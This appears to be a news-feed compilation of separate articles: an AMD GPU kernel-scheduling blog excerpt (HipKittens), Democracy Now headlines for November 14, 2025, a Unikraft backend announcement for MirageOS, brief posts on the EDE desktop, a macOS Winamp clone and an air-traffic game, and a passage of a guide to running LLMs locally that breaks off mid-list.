When a single wave is mapped per SIMD, the 512 registers are actually divided into 256 accumulator general purpose registers (AGPRs) and 256 vector general purpose registers (VGPRs). AGPRs have fundamental hardware limitations (e.g., vector arithmetic instructions cannot operate on them), but they can still crucially serve as the input or outputs for MFMA instructions. HIPCC, however, cannot generate code that uses AGPRs as input to MFMA instructions, leading to inefficient register management for register heavy workloads and redundant accvgpr_read/write instructions that move data between VGPRs and AGPRs.

  • Register layouts : NVIDIA tensor core layouts are regular – as we vary the data type or matrix shape, the layout is composed of an underlying “core matrix” structure. Thus, frameworks like TK and Gluon can apply a unified swizzling rule to avoid bank conflicts. However, AMD layouts differ significantly based on the data type and matrix shape. In fact, we show that it’s not possible to use a single swizzle pattern for all layouts. Further, sometimes we want to use multiple matrix shapes within the same kernel meaning that our swizzle pattern needs to be compatible with multiple types of layouts concurrently.

Figure: AMD register layouts for matrix instructions are less structured. NVIDIA layouts are all composed from an underlying core matrix structure.

  • Instruction phases: Waves (and NVIDIA warps) execute shared memory read/write instructions in phases , where a subset of threads in the wave access shared memory concurrently. NVIDIA instructions sequentially assign threads to phases (e.g., threads 0-7 in phase one, 8-15 in phase two). However, the phase groups are both non-sequential and differ entirely based on AMD CDNA memory instruction. For example, we found that a ds_read_b128 \verb|ds_read_b128| instruction reading 128 bits for each thread executes across 4 phases and has access to 64 banks. On the other hand, a ds_write_b64 \verb|ds_write_b64| instruction writing 64 bits for each thread executes across 4 phases and has access to only 32 banks. This behavior is not well-documented even within AMD(! 😔), so we created and release solvers that reverse-engineer this behavior.
Learn why we can't use a single swizzle pattern for all AMD layouts.

Proof by contradiction:

To show why a single swizzling pattern is insufficient across different register tile shapes and layouts on AMD GPUs, consider the following two access patterns that surface in attention backwards:

  1. A row-layout 16x16 bf16 tile is written to shared memory. For this tile configuration, each thread holds 4 contiguous bf16 values - 64 bits in memory - and the most optimal instruction to issue this write is ds_write_b64 \verb|ds_write_b64| . Avoiding bank conflicts for this access requires a swizzle pattern that respects the phase ordering and bank behavior previously mentioned. In this case, a swizzle that abides by these constraints is computed as o f f s e t \mathrm{offset} ^ = ( ( o f f s e t % 512 ) > > 7 ) < < 3 = ((\mathrm{offset} \% 512) >> 7) << 3 , where 64-bit chunks of memory is shifted around memory using an XOR swizzle.
  2. A row-layout 16x32 bf16 tile is read from shared memory. For this tile, each thread holds 8 contiguous bf16 values - 128 bits in memory - and the most optimal instruction to issue this read is ds_read_b128 \verb|ds_read_b128| .

Regardless of the swizzling pattern required for ds_read_b128 \verb|ds_read_b128| , the granularities of these two instructions are in conflict with each other. ds_read_b128 \verb|ds_read_b128| requires at least 128 bits of memory to be contiguous in shared memory, and the swizzle pattern for ds_write_b64 \verb|ds_write_b64| breaks apart memory into 64-bit chunks. As a result, different swizzling patterns need to be used for each.

  • Address generation: AMD GPUs support direct asynchronous HBM to shared memory loads. Like TMA, these loads bypass the register file. The instruction takes as input per-thread addresses in HBM from which each thread will read data. While DSLs like TK directly swizzle the shared memory addresses, swizzling shared memory on AMD is instead accomplished by swizzling on the HBM addresses.

We provide developers with optimized tile layouts and memory access patterns by default within HK. Checkout our paper to learn more about how we implement solutions to the above challenges.

HipKittens schedules within a processor

Ideally we would have simple, reusable patterns for scheduling the compute and memory within kernels that generalize across AI workloads. Wave specialization / producer consumer serves this purpose on NVIDIA, but what about on AMD?

Wave specialization struggles on AMD. Wave specialization is the dominant paradigm for achieving high occupancy on modern NVIDIA GPUs. Producer waves focus on memory movement while consumer waves focus on computation. This strategy underpins today’s state-of-the-art AI kernels—including FlashAttention-3 , COMET for MOE models , and high-performance GEMMs —as well as kernel DSLs such as ThunderKittens LSCF and TileLang .

But, we show that wave specialization underperforms on AMD due to the lack of register reallocation. On the MI355X, registers are statically divided across all waves. Producer waves that only need a few registers for address calculation are allocated more registers than they need; consumer waves cannot recoup those registers and must either spill registers to scratch memory or run at a lower arithmetic intensity. Both are disastrous for performance. Wave specialization limits the output tile size and makes our kernels more memory bound. For GEMMs, data loaded from memory is O(MK + NK) while compute is O(MNK). Decreasing the M or N in our per thread block output tile size lowers arithmetic intensity. 2

# P / # C MFMA Shape Output TFLOPS
HK 4 / 8 16×16×32 128×256 893
HK 4 / 12 16×16×32 192×256 1278
HK 0 / 8 16×16×32 192×256 1281
HK 0 / 8 16×16×32 256×256 1605
TK 256×256×16 256×256 1538
CUTLASS 256×256×16 256×256 1570

Figure: Wave specialization underperforms on AMD GPUs. We benchmark AMD GEMMs on the MI355X using different numbers of producers (P) and consumer (C) waves. We report the matrix core intrinsic shape, output tile size computed per thread block, and TFLOPs (500 iterations warmup / 100 iterations measured). The CUTLASS GEMM is selected and tuned using the CUTLASS profiler tool on a B200 GPU.

As an aside, it might be surprising that AMD matches NVIDIA GEMM performance without all the bells and whistles of wgmma/tma, producer consumer, TMA, mbarriers, large shared memory for deep multi-stage pipelining etc. But… AMD has a 2 × 2\times larger register file and AMD’s smaller tensor core shapes (e.g., 16 × 16 × 32 16\times16\times32 ) provide an alternative path to establish deep pipelines by using finer-granularity load and compute stages.

Scheduling patterns for AMD. Our attempt to use wave specialization - a strategy that works well on NVIDIA GPUs - did not yield the expected speedups on AMD hardware. All is not lost! We found two scheduling patterns that consistently yield high occupancy AMD GPUs, while using tile programming primitives (no raw assembly)!

  1. 8-wave ping-pong: We assign two waves per SIMD and at any given time, one is executing a cluster of memory instructions while the other wave executes a cluster of compute instructions. The waves swap at the end of cluster execution. With this approach, the developer can use large HK tiles since a thread issues many of the same instructions at once!
  2. 4-wave interleave: We assign one wave per SIMD and threads in this wave finely switch between issuing memory and compute operations. Here, the developer uses small HK tiles (essentially matching the size of the matrix core instruction shape) to achieve the fine-grained schedule.

These two patterns tradeoff programmability and performance, where 8-wave and its large tile primitives lead to compact code and 4-wave fine-grained interleaving expands code size. Surprisingly, the 8-wave schedule is sufficient to achieve SoTA-level performance on GEMMs and attention forwards. For GQA non-causal attention backwards, 8-wave also outperforms all AMD baselines by 1.8 × 1.8\times , and our HK 4-wave further outperforms by 2.3 × 2.3\times .

Figure: HK 8-wave ping pong pattern. We include a profiler snippet of the HK BF16 GEMM.

HipKittens schedules across processors

Modern GPUs are moving toward chiplet-based architectures, shifting away from traditional monolithic dies. AMD’s MI355X, for instance, integrates eight chiplets (XCDs), each with its own L2 cache, while NVIDIA’s B200 pairs two dies together. This shift enables higher scalability and yield but introduces a new performance challenge: disaggregated memory hierarchies. Each cluster of compute units now has local caches, and memory locality is no longer uniform across the chip.

On AMD GPUs, thread blocks are scheduled to chiplets in a round-robin fashion, meaning that the order in which blocks are launched—the grid schedule—directly affects how effectively data is reused in cache. Even perfectly tuned kernels can lose bandwidth if their grid layout is cache-unfriendly.

Figure: Visualization of three different grid schedules for the output matrix of a BF16 GEMM. The color represents the XCD assignment for the first set of thread blocks scheduled across the GPU's 256 processors. Top row is for a 9216 × 9216 × 9216 9216\times9216\times9216 shaped GEMM and the bottom row is for a 14592 × 14592 × 14592 14592\times14592\times14592 shaped GEMM. The left most column shows the assignments under a naive row-major layout, the middle column shows an approach that optimizes L2 cache reuse, and the right column shows the output from our algorithm, balancing L2 and LLC cache reuse.

Block Order L2 % LLC % Mem. BW TFLOPS
Matrix Multiply (M=N=K=9216)
Row-major 55% 95% 15.1 TB/s 1113
XCD (W 7/C 216) 79% 24% 14.9 TB/s 991
XCD (W 5/C 25) 75% 93% 18.3 TB/s 1145
Matrix Multiply (M=N=K=14592)
Row-major 36% 76% 10.7 TB/s 900
XCD (W 8/C 542) 79% 7% 13.9 TB/s 980
XCD W 8/C 64 78% 55% 16.6 TB/s 1068

Table: Performance results corresponding to the above chiplet swizzling figures.

Above for a GEMM D = A B + C D=AB + C , we show different patterns for assigning thread blocks the responsibility of computing different tiles of the output matrix D D . When thread blocks are scheduled in naíve row-major order, cache reuse is suboptimal ( 55 % \approx55\% ) because blocks that share the same L2 cache often load different, non-overlapping tiles of A and B. Further, optimizing purely for L2 locality can cause each XCD to fetch disjoint portions of A and B, leading to redundant loads at the next cache level.

To address this, HipKittens introduces a chiplet-aware scheduling strategy that reorganizes the grid launch order to better exploit locality at both the L2 (per-chiplet) and LLC (shared) cache levels for GEMM workloads. The key idea is to group thread blocks that operate on nearby regions of the output matrix so that they naturally reuse overlapping tiles of input data across cache hierarchies.

Putting it all together

Let's take a look at a few kernels written in HK.

  1. First, here's the hot loop of our attention forwards pass kernel (the entire kernel is 500 \approx 500 lines of code). We can see that the kernel uses HK's 8-wave ping pong schedule where waves alternate between compute instruction clusters and memory clusters.
  1. Here's the core hot loop structure for our BF16 GEMM kernel. Again, we can see that waves alternate between compute clusters and memory clusters using HK's 8-wave ping pong schedule.

Multi-silicon AI is coming!

HipKittens delivers competitive performance on AMD CDNA3 and CDNA4 through three key insights: optimized memory access, AMD-centric wave scheduling patterns within a processor, and chiplet-aware grid scheduling across processors to exploits AMD's disaggregated cache hierarchy. Our kernels consistently achieve peak performance amongst AMD baselines across workloads (and compete with peak Blackwell kernels as well).

Realizing AI's full potential requires diverse, open hardware. 1 Today, that means making AMD GPUs truly accessible.

We want more AI in the world. AI has relied on and innovated on a single hardware provider, but we need to be able to use and experiment with all the compute we can. We need to be able to use the fastest hardware out there. We’re happy to help address these problems with HipKittens!

Figure: Surfing towards multi-silicon AI!

Links : Arxiv | Code

Headlines for November 14, 2025

Democracy Now!
www.democracynow.org
2025-11-14 13:00:00
Hegseth Announces “Operation Southern Spear” to Target “Narco-Terrorists” Across Hemisphere, 900,000 Palestinians Face Flood Risk as Heavy Rains Compound Gaza’s Misery, Israeli Forces Kill Two Palestinian Children in Raid Near Hebron as Settlers Set Fire to Mosque, Russ...
Original Article

Headlines November 14, 2025

Watch Headlines

Hegseth Announces “Operation Southern Spear” to Target “Narco-Terrorists” Across Hemisphere

Nov 14, 2025

Defense Secretary Pete Hegseth has announced “Operation Southern Spear”—a military campaign he said would target “narco-terrorists” across the Western Hemisphere. Hegseth’s announcement on social media came as the Pentagon said it had blown up another boat in the Caribbean Sea, reportedly killing four people aboard. It’s the 20th such strike, bringing the reported death toll to 80 people. The Pentagon claims the boats were carrying drugs but officials have acknowledged they don’t know who has been killed. The attacks have been condemned as unlawful extrajudicial killings by the U.N.’s human rights chief, governments including Mexico, Colombia and the European Union and U.S. lawmakers, among others.

Meanwhile, Secretary of State Marco Rubio has denied reports by CNN that the United Kingdom has stopped sharing intelligence on drug trafficking vessels over concerns about the US strikes.

Marco Rubio : “I did see a CNN report yesterday. I’m not going to go into great detail and to say that, it’s a false story, it’s a fake story.”

900,000 Palestinians Face Flood Risk as Heavy Rains Compound Gaza’s Misery

Nov 14, 2025

In Gaza, officials warn more than 900,000 displaced Palestinians face the risk of flooding as a storm system brings heavy rains and colder temperatures to a region where Israeli attacks have left 85 percent of road, water and sewage networks damaged or destroyed. Municipal authorities warn entire neighborhoods are at risk of being flooded by overflow from sewage stations left damaged from Israeli attacks or unable to operate due to a lack of fuel.

Israeli Forces Kill Two Palestinian Children in Raid Near Hebron as Settlers Set Fire to Mosque

Nov 14, 2025

In the occupied West Bank, Israeli forces shot and killed two Palestinian boys in a village north of Hebron and then seized their bodies. Separately, three Palestinians, including a 14-year-old child, were injured after Israeli forces fired on them during a raid southeast of occupied East Jerusalem. This comes amid a record wave of violent attacks by Israeli settlers on Palestinians during this year’s olive harvest. On Tuesday, masked Israeli settlers stormed a dairy plant near the town of Beit Lid, setting fire to vehicles; and on Thursday settlers set fire to the Hajja Hamida Mosque in the Palestinian village of Deir Istiya. This is local activist Nazmi Salman.

Nazmi Salman : “This attack comes within the framework of the declared war against the Palestinian people by settlers with the support of the occupation government. This attack violated the sanctity of places of worship and mosques. There were racist slogans written on the northern walls of the mosque.”

Russian Attacks on Ukraine Kill at Least 6 in Kyiv, 2 in Odesa Region

Nov 14, 2025

In Ukraine, at least six people were killed and 30 others injured as Russia launched a massive overnight assault on nearly every district of the capital, Kyiv. Officials said Russia’s attack involved 430 drones and 18 missiles, making it one of the biggest on Ukraine’s capital since Russia’s full-scale invasion in 2022. Many of the attacks struck residential high-rise buildings, scattering debris and sparking huge fires.

bq: Survivor : “I was terrified, so terrified I didn’t know what to do first. Should I rescue myself and my child? Or should I run to help others because many people were screaming and needed help.”

Russian drones also struck Ukraine’s southwestern Odesa region, killing at least two people. Meanwhile, Russian officials say at least one person was injured when Ukraine launched drone attacks on Russia’s Belgorod region, and president Volodymyr Zelensky said his forces had fired long-range cruise missiles into Russia.

This all comes as Zelensky responded to a growing corruption scandal by firing Ukraine’s Justice and Energy ministers, who are accused of taking part in a massive bribery scheme.

Trump Administration Says It May Never Report October’s Inflation and Job Loss Data

Nov 14, 2025

Here in the United States, many food banks are reporting record demand, even after the longest government shutdown came to an end with a promise to restore SNAP food assistance benefits that the Trump administration withheld beginning on Nov. 1. A tally by the Associated Press found about two-thirds of states had issued only partial benefits or none at all before the government shutdown ended late Wednesday.

Meanwhile, the White House says the Bureau of Labor Statistics may never release October data on inflation and job losses, blaming the government shutdown. Data from the private sector firm ADP show the US economy lost about 11,000 jobs per week through late October.

Federal Agents Release Chicago Teacher Arrested by ICE at Child Care Center

Nov 14, 2025

Federal agents in Chicago have released preschool teacher Diana Santillana Galeano, a mother of two from Colombia whose arrest by ICE drew international outrage. Her arrest—in front of parents and children by federal agents who did not produce a warrant—came even though she had authorization to work in the day care center and had undergone a background check. She’s returning to work today at the Rayito de Sol Spanish Immersion Early Learning Center.

Trump Administration to Deploy Border Patrol to Charlotte and New Orleans

Nov 14, 2025

Border Patrol chief Gregory Bovino has reportedly left Chicago and will travel to North Carolina to oversee a new immigration crackdown in the city of Charlotte. Local officials including the Mecklenburg County sheriff say they were given no advance warning of the deployment. The Trump administration is also reportedly planning to surge federal agents in New Orleans, Louisiana.

US Bishops Condemn “Dehumanizing Rhetoric and VIolence” of Trump’s Mass Deportation Campaign

Nov 14, 2025

Image Credit: U.S. Conference of Catholic Bishops

The United States Conference of Catholic Bishops has rebuked the Trump administration over its mass deportation policies, calling for an end to what it called, “dehumanizing rhetoric and violence.” The bishops issued their statement after a nearly unanimous vote at their annual fall meeting in Baltimore. This is the conference’s general secretary, Rev. Michael JK Fuller.

Rev. Michael JK Fuller : “In cities across the United States, our migrant brothers and sisters, many of them our fellow Catholics, face a culture of fear, hesitant to leave their homes and even to attend church for fear of being randomly harassed or detained. Holy Father, please know that the bishops of the United States, united in our concern, will continue to stand with migrants and defend everyone’s right to worship free from intimidation.”

At the same meeting, US bishops voted in favor of a ban on gender-affirming care for transgender patients at Catholic hospitals.

US Issues New Visa Restrictions Discriminating Against People With Medical Conditions

Nov 14, 2025

Image Credit: U.S. Customs and Border Protection

The Trump administration has issued new visa restrictions for foreigners and immigrants seeking to visit or live in the United States. Under the latest directive, applicants may be denied a U.S. visa over certain medical conditions such as diabetes or obesity, and lack of economic resources and assets. The State Department has reportedly directed embassy and consular staff to rigorously vet visa applicants to demonstrate they will not seek any public benefits, including food aid, from the U.S. federal government, saying such people could become a “public charge” and drain U.S. resources. Immigration rights advocates have denounced the measure as “dangerous,” saying it will further curtail the already-limited legal pathways for people to come to the U.S.

Spaceflight Firm Founded by Jeff Bezos Lands First Stage of Giant Rocket, Challenging Musk’s SpaceX

Nov 14, 2025

Image Credit: Blue Origin

The rocket company founded by Amazon multi-billionaire Jeff Bezos has successfully landed the first stage of its giant new launch vehicle, in a major challenge to Elon Musk’s SpaceX, which dominates the commercial space industry. Blue Origin’s New Glenn rocket took off from Cape Canaveral Space Force Station on Thursday afternoon carrying a pair of NASA space probes bound for Mars. By successfully landing its booster stage on a drone ship downrange, Blue Origin seeks to dramatically cut the cost of launching satellites to Earth orbit and beyond. That’s central to plans by Jeff Bezos to build a constellation of internet satellites to compete with Elon Musk’s Starlink, which has about 9,000 operational satellites on orbit.

Katie Wilson Wins Seattle Mayor’s Race After Insurgent Campaign Demanding Affordability

Nov 14, 2025

Image Credit: Wilson For Seattle

In Seattle, first-term mayor Bruce Harrell has conceded defeat in his reelection fight against community organizer Katie Wilson, who campaigned on a message of affordability in a city where the cost of living has soared. Wilson’s platform calls for progressive taxation to raise revenue from the wealthiest households and corporations to pay for affordable housing and social programs benefiting families. Wilson spoke to reporters Thursday after mayor Harrell conceded.

Katie Wilson : “I want everyone in this great city of ours to have a roof over their head. I want universal child care and free K through 8 summer care. I want worldclass mass transit. I want great, safe public spaces where kids can run around with abandon. I want stable, affordable housing for renters. I want social housing. I want much more land and wealth to be owned and stewarded by communities instead of corporations. I want a robust economy with thriving small businesses, great living wage jobs, and strong rights for workers.”

Workers Strike at Dozens of Starbucks Stores Across U.S. to Demand Union Contracts

Nov 14, 2025

More than 1,000 workers at 65 Starbucks stores across the United States held a one-day strike Thursday to protest Starbucks’s campaign of unionbusting and its refusal to negotiate union contracts. The baristas held the action on “Red Cup Day,” typically one of Starbucks’ busiest days of the year. Starbucks Workers United calls the company one of the most egregious violators of US labor law in modern history, with the National Labor Relations Board finding over 500 labor law violations; another 700 pending unfair labor practices charges have yet to be litigated. This is Rey Shao, a 23-year-old barista at a Starbucks store in Manhattan.

Rey Shao : “I’m putting in overtime every week just so I could afford my rent, so I can afford bills. It’s crazy that we’re working a full-time job, and I still can’t afford to pay the basic necessities I need to live. And meanwhile, our CEO is making $96 million, and he… for only four months of work, and meanwhile our CEO is riding in a private jet, and I’m barely able to afford the MTA fare to go to work.”

On Thursday, New York Mayor-elect Zohran Mamdani wrote online, “While workers are on strike, I won’t be buying any Starbucks, and I’m asking you to join us. Together, we can send a powerful message: No contract, no coffee.”

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Announcing Unikraft Support for MirageOS Unikernels

Lobsters
tarides.com
2025-11-14 12:57:01
Comments...
Original Article

We are happy to announce the release of Unikraft backend support for MirageOS unikernels! Our team, consisting of Fabrice Buoro, Virgile Robles, Nicolas Osborne, and me (Samuel Hym), have been working on this feature for the past year. We’re excited to bring it to the community and hope to see many people try it out.

This post will give you an overview of the release, including some background on Unikraft and performance graphs. You will already be familiar with most of this if you read our post on Discuss .

What is Unikraft and Why Did We Choose It?

Unikraft is a unikernel development kit: a large collection of components that can be combined in any configuration that the user wants in the unikernel tradition of modularity. Unikraft's scope is larger than that of Solo5 (a backend that MirageOS also supports ). It aims to make it easy to turn any Unix server into an efficient unikernel.

In fact, the initial motivation behind exploring Unikraft as a MirageOS backend was to experiment and see what performance levels we could reach. We were particularly excited about using their Virtio-based network interface, as virtio is currently only implemented for one specific x86_64-only backend in Solo5. Some of the immediate performance differences we observed are detailed further down, but performance is not all we hope to gain from the Unikraft backend in the long run.

Unikraft is on the road to being multicore compatible (i.e., having one unikernel using multiple cores). While this is not ready yet and significant effort is needed to get there, it means that the MirageOS backend will eventually benefit from these efforts and support the full set of OCaml 5 features.

Furthermore, the Unikraft community (which is quite active) is experimenting with a variety of other targets, such as bare-metal for some platforms or new hypervisors (e.g. seL4). Any new target Unikraft supports can then be supported ‘for free’ by MirageOS too. For example, the Unikraft backend has already resulted in Firecracker being a new supported virtual machine monitor (VMM) for MirageOS.

Lastly, since Unikraft is POSIX-compatible (for a large subset of syscalls), it has the potential to enable MirageOS unikernels to embed OCaml libraries that have not been ported yet. This compatibility could be especially useful for large libraries which are hard to port ( owl comes to mind).

How Does Unikraft Support Work?

Adding the new MirageOS backend required that we create or modify a series of components:

Using Unikraft with a QEMU or a Firecracker backend is as simple as choosing the unikraft-qemu or the unikraft-firecracker target when configuring a unikernel.

The OCaml/Unikraft Cross Compiler

To build the OCaml cross compiler with Unikraft, we used the Unikraft core, Unikraft lib-musl , and musl . The musl library is the C library recommended by Unikraft for building programs using the POSIX interface. The combination made it easy to build the OCaml 5 runtime, particularly because it provided an implementation of the pthread API, which is now used in many places in the runtime. It could also potentially make it easier to port some libraries that depend on Unix to work on Unikraft backends.

The OCaml cross compiler builds upon the work that has been upstreamed to ease the creation of cross compilers , using almost the same series of patches as for ocaml-solo5 . So the only versions of the compiler that are currently supported for OCaml/Unikraft are OCaml 5.3 and 5.4. All the patches have been upstreamed to OCaml so there should no longer be any patches required by OCaml 5.5.

Note that we didn’t go with the full standard Unikraft POSIX stack, which includes lwIP to provide network support. We had a prototype at some point relying on lwIP to validate our progress on other building blocks, but it raised many incompatibility issues with the standard MirageOS network stack, so we dropped support for lwIP for now. Instead, we developed the libraries required to plug the MirageOS stacks into the low-level interfaces provided by the Unikraft core.

The New MirageOS Libraries for Unikraft Support

Unikraft support comes with packages using the standard names, mirage-block-unikraft and mirage-net-unikraft , to support the block and network devices. These libraries are implemented directly on top of the low-level Unikraft APIs, and therefore use virtio on both QEMU and Firecracker VMMs.

To evaluate the quality of the implementations for these devices, we ran a couple of small benchmarks using OCaml 5.3 and Unikraft 0.18.0. You can find the benchmarks (including the unikernels along with some scripts to set them up and run them) in the benchmarks directory in @Firobe’s fork of mirage-skeleton, benchmarks branch .

Network Device

To measure the performance of the network stack, we tweaked the simple network skeleton unikernel to compute statistics and used a variable number of clients all sending 512MB of null bytes. We have run this benchmark on both a couple of x86_64 laptops and on an LX2160 aarch64 board, all running a GNU/Linux OS.

We have observed a lot of variability in the performance of the solo5-spt unikernel (sometimes better, sometimes worse than unikraft-qemu ) depending on the actual computer used, so these measurements should be taken with a grain of salt.

On two different x86_64 laptops: Network benchmark: Unikraft solo5-spt and solo5-hvt, in decreasing performance order Network benchmark: Unikraft or solo5-spt are fatest, depending on the number of connections, solo5-hvt slower

On the LX2160 aarch64 board: Network benchmark: Unikraft solo5-spt and solo5-hvt, in decreasing performance order

Block Device

To measure the performance of the block devices, we wrote a simple unikernel copying data from one disk to another. We can see that the performance of unikraft-qemu is lower than solo5-hvt for small buffer sizes, but fortunately, the situation improves with larger buffer sizes. We only ran this benchmark on an x86_64 laptop, as there is currently an issue with two block devices on aarch64 on Unikraft. Block device benchmark: solo5-spt fatest on small buffer sizes, Unikraft-QEMU fatest on larger buffer sizes, Unikraft-Firecracker and solo5-hvt slower

It is worth mentioning that I/Os can be parallelised, which also yields a significant performance boost. Indeed, mirage-block-unikraft can leverage the parallelised virtio backend of QEMU and Firecracker, which solves the problem of limiting I/Os to what the hardware supports in terms of both parallelism and sector size.

Current Limitations

  1. In our tests, only Linux appeared to be well supported for compiling Unikraft at the moment. As a result, we have restricted our packages to that OS for now.
  2. Unikraft supports various backends. At the moment, we’ve only added support and tested its two major ones: QEMU and Firecracker.

Try it Out

To try the new Unikraft backend for MirageOS, you need to use an OCaml 5.3 or 5.4 switch, so that you can install mirage and the OCaml/Unikraft cross compiler. The short version could be:

$ opam switch create unikraft-test 5.4.0 # or 5.3.0, and if needed
$ opam install mirage ocaml-unikraft-backend-qemu ocaml-unikraft-x86_64

See below for some explanations about the numerous OCaml/Unikraft packages. From then on, you can follow the standard procedure (see how to install MirageOS and how to build a hello-world unikernel ) to build your unikernel with the Unikraft backend of your choice, which should boil down to something like:

$ mirage configure -t unikraft-qemu
$ make

Details About the Various Packages for the OCaml/Unikraft Cross Compiler

The OCaml cross compiler to Unikraft is split up into 14 packages (see the PR to opam-repository for more details) so that users can:

  • Choose which of the backends (QEMU or Firecracker) and which of the architectures ( x86_64 and arm64 ) they want to install, where all combinations can be installed at the same time.
  • Choose which architecture is generated when they use the unikraft OCamlfind toolchain by installing one of the two ocaml-unikraft-default-<arch> packages.
  • Install the ocaml-unikraft-option-debug to enable the (really verbose!) debugging messages.

Furthermore, virtual packages can be installed to make sure that one of the architecture-specific packages is indeed installed:

  • ocaml-unikraft can be installed to make sure that there is indeed a unikraft OCamlfind toolchain installed.
  • ocaml-unikraft-backend-qemu and ocaml-unikraft-backend-firecracker can be installed to make sure that the unikraft OCamlfind toolchain supports the corresponding backend.

Those virtual packages will be used by the mirage tool when the target is unikraft-qemu or unikraft-firecracker .

All those packages use one of two version numbers. The backend packages use the Unikraft version number (0.18.0 and 0.20.0 have been tested and packaged) while the latest OCaml cross-compiler packages use version 1.1.0.

Conclusion

We are still experimenting with this new backend. We expect to run it in production in the coming months, but it may need improvements nevertheless. Notably absent from this release is an early attempt to leverage Unikraft’s POSIX compatibility to implement Mirage interfaces instead of hooking directly to Unikraft’s internal components. This early version used Unikraft’s lwIP -based network stack instead of Mirage’s (fooling Mirage into thinking it was running on Unix), and it may be interesting to revisit this kind of deployment, in particular for easy inclusion of Unix-only OCaml libraries in unikernels.

We are eager for reviews, comments, and discussion on the implementation, design, and approach of this new Mirage backend, and hope it will be useful to others.

You can connect with us on Bluesky , Mastodon , Threads , and LinkedIn or sign up for our mailing list to stay updated on our latest projects. We look forward to hearing from you!

EDE: Small and Fast Desktop Environment

Hacker News
edeproject.org
2025-11-14 12:51:23
Comments...
Original Article

EDE is small desktop environment built to be responsive, light in resource usage and to have familiar look and feel. It runs on Linux, *BSD, Solaris, Minix, Zaurus and even on XBox.

Download version 2.1

or you can browse for older releases.

Winamp for OS/X

Hacker News
github.com
2025-11-14 12:44:07
Comments...
Original Article

Winamp macOS

A native macOS application that recreates the classic Winamp experience for playing MP3 and FLAC audio files.

Full Screen

Fullscreen Visualizer

Screenshot 2025-11-09 at 3 37 26 PM

Minimized (Playlist + Main Window independently)

Minimized Playlist

Releases / Download

Releases

Support

If you enjoy using Winamp macOS and would like to support its development, consider buying me a coffee:

Buy Me A Coffee

Support on Buy Me a Coffee

Features

  • 🎵 MP3 and FLAC playback support

  • 🎨 Winamp-inspired UI

  • 📝 Playlist management / M3U

  • ⏯️ Full playback controls (play, pause, stop, next, previous)

  • 📊 Spectrum analyzer visualization

  • 🎚️ 10-band equalizer

  • 🔍 File browser with drag-and-drop support

  • Multiple oscilliscope visualizations

  • Milkdrop (click on the icon in the main app) - supports fullscreen mode

  • Lyrics overlay in Milkdrop

Requirements

  • macOS 13.0 or later
  • Xcode 15.0 or later

Building

Using Xcode

  1. Open Winamp.xcodeproj in Xcode
  2. Select the Winamp scheme
  3. Build and run (⌘R)

alternatively

Using Swift Package Manager

alternatively

License

MIT License - Feel free to use and modify as needed.

Arrival Radar

Hacker News
entropicthoughts.com
2025-11-14 12:23:53
Comments...
Original Article

Your objective is to land planes as quickly as possible while maintaining separation between them, and you do this by assigning them routes that take them to the final approach. That’s all you can do, in contrast to other atc simulators which let you vector planes directly, assign altitudes and speeds, etc. This constraint makes for some challenge, because planes arrive randomly and tend to end up violating separation minima unless you assign routes cleverly and actively.

arrival-radar-01.png

In order to prevent conflicts, you’ll have to be deft at re-assigning routes and asking planes to join their routes at specific waypoints. To help you in your mission, the planes do slow down a little if there is other traffic ahead of them, and there are speed restrictions on waypoints closer to the airport to make higher density possible where the routes come together.

It’s fun and addicting! Click the link above to read more about the game and how to play.

How to Deploy LLM Locally

Lobsters
blog.lyc8503.net
2025-11-14 12:18:42
Comments...
Original Article

This article is currently an experimental machine translation and may contain errors. If anything is unclear, please refer to the original Chinese version. I am continuously working to improve the translation.

Content for a club presentation, archived here. LLMs evolve rapidly—this might become outdated quickly, so please use your search skills flexibly to get the latest information.


Introduction

A few years ago, before LLMs burst onto the scene, many small models could easily run on all sorts of devices.

For example, you could casually whip up a CNN with fewer than 1000 parameters , train it on MNIST in under a minute, achieve 94% accuracy on handwritten digit recognition, and—on modern GPUs—process over 10,000 images per second without any optimization effort.

A super tiny CNN with just 786 parameters A super tiny CNN with just 786 parameters

Now you’ve learned CNNs. Just make it a tiny bit deeper and wider like this , scale it up 16,000x to 13.5M parameters, and you can boost its recognition power even further. For instance, you could use it to crack CAPTCHAs.

Purely for demonstration: a CAPTCHA Purely for demonstration: a CAPTCHA

This CAPTCHA solver is from my Tampermonkey script lyc8503/ddddocr_web , powered by ONNX Wasm running directly in the browser. Even on a regular laptop CPU, it solves CAPTCHAs in under 0.2 seconds with over 95% accuracy.

Back in the pre-LLM era, state-of-the-art models like BERT or ResNet typically stayed under 100M in size.

The LLM Era

In November 2022, OpenAI launched the ChatGPT series. GPT-3 scaled up another 1000x, reaching a staggering 175B parameters—its weights alone take up 350 GB of space. This poses a massive challenge for local deployment.

Image from bbycroft.net/llm Image from bbycroft.net/llm

Why We Need Locally Deployable Open-Weight LLMs

  1. Transparency and consistency
  2. Lower costs and prevention of monopolies
  3. Bypassing online content censorship ( “data security” )
  4. Ability to fine-tune or hack the model

How to Run an LLM in Three Steps (like stuffing an elephant into a fridge)

  1. Get suitable hardware
  2. Download model weights
  3. Install a proper inference framework and run it

Qwen3-Next-80B-A3B running locally, 46 tokens/s Qwen3-Next-80B-A3B running locally, 46 tokens/s

Model Selection

Every model claims to be SOTA when released—so which one should you pick? I usually check the cyber-cricket-fighting leaderboard: https://lmarena.ai/leaderboard

For niche models, you can also search HuggingFace or forums like r/LocalLLama . There’s a new model popping up every day.

Models can be categorized by their activation parameters during inference:

  • Dense models
  • MoE (Mixture of Experts) models

They can also be classified by whether they have a “thinking” process:

  • Thinking
  • Instruct
  • Hybrid

Hardware Selection

Here’s a rough ranking of hardware components by importance:

  1. VRAM (Video Memory Size)
    The deciding factor. Insufficient VRAM forces offloading to system RAM or even disk, which can drastically slow things down.

    • NVIDIA H100: 80GB
    • NVIDIA A100: 40GB / 80GB
    • RTX 4090: 24GB
  2. Memory Bandwidth
    Large models need high-speed access to all parameters for efficient computation.

    • H100: ~2 TB/s
    • A100: ~1.5 TB/s
    • RTX 4090: ~1 TB/s
    • CPU DDR5: ~100 GB/s (PCIe 4.0 x16 ~32 GB/s)
  3. Compute Power (BF16/FP16)

    • H100 (BF16 Tensor): ~200 TFLOPS
    • A100 (BF16 Tensor): ~78 TFLOPS
    • RTX 4090 (FP16): ~83 TFLOPS
    • EPYC 9654: theoretical ~4 TFLOP
